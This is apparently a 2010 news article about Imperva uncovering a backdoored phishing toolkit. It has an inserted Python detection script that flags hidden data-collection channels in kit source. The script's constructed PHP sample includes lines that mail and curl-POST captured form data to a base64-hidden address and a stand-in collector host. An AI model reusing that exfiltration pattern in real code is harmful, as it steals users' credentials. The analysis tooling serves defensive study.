Attacks/Breaches
7/23/2010
01:50 PM

Imperva Identifies Cloud Based Phishing Kit

Cybercriminals can create attacks spoofing 16 sites, including Facebook, RapidShare and Skype, using the next-generation phishing toolkit.

A recently released, next-generation phishing toolkit promises to automate the tedious task of tricking people into visiting websites designed to steal their financial information. Even better, the toolkit is free. The only hitch: the creators added a backdoor, allowing them to also amass all of the data captured by their phishing toolkit, no matter who uses it.

In other words, it's a pyramid scheme written by hackers to target other hackers, as well as you. While one attacker may amass dozens or hundreds of credentials, the toolkit's creators get the combined take and likely, first stab at every stolen credential.

To date, the toolkit has been widely used to launch phishing attacks that spoof major companies. "The ones we know of are PayPal, Hotmail and Yahoo," said Rob Rachwald, director of security strategy at Imperva, which discovered the toolkit. But the toolkit's settings allow attackers to create attacks spoofing 16 sites in total, including Facebook, RapidShare and Skype. The toolkit is written in English, but includes a tutorial written in Arabic.

Attacks using the toolkit remain very much at large. Furthermore, its creators boasted that the toolkit has been downloaded more than 200,000 times, though that number should obviously be taken with a grain of salt. "There's no way to validate that, but even if he's exaggerating, and you go with 20,000 times, and everyone who used it managed to get 100 credentials," that's a lot of stolen data, said Rachwald.

Unfortunately, attacks based on the toolkit are likely to stay in circulation. That's because the toolkit uses separate websites for hosting the attack and gathering the stolen data -- a little-seen innovation for automated phishing attacks. As a result, said Rachwald, "it may be easy to pull the front end" -- meaning the attack website, which spoofs a real website -- off the web. "But it's hard to eliminate the back end" that collects data.
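The two points above, a kit that secretly copies every capture to its authors and a collection back end hosted apart from the spoofed page, are exactly what an analyst looks for when a phishing kit is recovered from a compromised host. The script below is an added example, not code from Imperva or from the toolkit the article describes: it walks a kit's source files, extracts every outbound destination (e-mail addresses and URLs, including ones hidden behind base64), compares them with the recipient the operator configured, and lists the hosts a takedown team would need to pursue. The PHP fragments, file names, variable names and addresses are all constructed for the example and are not taken from the real kit.

```python
import base64
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# Constructed sample imitating the shape of a kit's "send" logic. Nothing here
# is from the kit in the article; config.php holds what the operator chose,
# send.php adds two destinations the operator never configured.
SAMPLE_KIT_FILES: Dict[str, str] = {
    "config.php": """<?php
$send_to = "operator@example.net";               // operator's own mailbox
$backend = "https://collector.example.org/in.php";  // operator's own collector
?>""",
    "send.php": """<?php
include("config.php");
$body = http_build_query($_POST);
mail($send_to, "log", $body);
// hidden second recipient, obfuscated with base64 (constructed example)
mail(base64_decode("YXV0aG9yQGV4YW1wbGUuY29t"), "log", $body);
$ch = curl_init($backend);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
curl_exec($ch);
// hidden second collector the operator does not know about
$ch2 = curl_init("http://hidden.example/drop.php");
curl_setopt($ch2, CURLOPT_POSTFIELDS, $body);
curl_exec($ch2);
?>""",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
URL_RE = re.compile(r"https?://[^\s\"']+")
# Literal base64 strings passed to base64_decode(); a common hiding spot.
B64_RE = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")


def _destinations_in(text: str) -> Set[str]:
    """Plain-text e-mail addresses and URLs found in a blob of source."""
    return set(EMAIL_RE.findall(text)) | set(URL_RE.findall(text))


def all_destinations(src: str) -> Set[str]:
    """Destinations in a file, including those hidden behind base64 literals."""
    found = _destinations_in(src)
    for enc in B64_RE.findall(src):
        try:
            decoded = base64.b64decode(enc, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text; ignore
        found |= _destinations_in(decoded)
    return found


def find_hidden_channels(files: Dict[str, str],
                         config_name: str = "config.php") -> Dict[str, List[str]]:
    """Map each non-config file to destinations absent from the operator config.

    Anything listed here receives captured data without the operator having
    configured it, i.e. a backdoor channel to a third party.
    """
    configured = all_destinations(files.get(config_name, ""))
    hidden: Dict[str, List[str]] = {}
    for name, src in files.items():
        if name == config_name:
            continue
        extra = all_destinations(src) - configured
        if extra:
            hidden[name] = sorted(extra)
    return hidden


def collector_hosts(files: Dict[str, str]) -> Set[str]:
    """Every host that receives captured data over HTTP(S), across all files.

    These are the back-end sites that survive a takedown of the spoofed page.
    """
    hosts: Set[str] = set()
    for src in files.values():
        for url in URL_RE.findall(src):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    return hosts


if __name__ == "__main__":
    print("hidden channels:", find_hidden_channels(SAMPLE_KIT_FILES))
    print("collector hosts:", collector_hosts(SAMPLE_KIT_FILES))
```

On the constructed sample the script reports the base64-hidden mailbox and the second collector URL in `send.php` as channels the operator never configured, and lists both collector hosts. Against a real kit the same approach needs to be widened to whatever obfuscation the author used (string concatenation, hex escapes, `eval` of packed code), so treat a clean result as "nothing obvious" rather than "nothing hidden".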

While no easy way to block the toolkit has been found, one thing that has been positively identified is the identity of the creators, who apparently like to brag. Rachwald said that through "a combination of us being clever and them being stupid," Imperva managed to identify the toolkit creators, including names, photographs and current location -- Algeria.

What did Imperva do, once it learned their identities? "We're not the FBI. So we let some people know," said Rachwald.
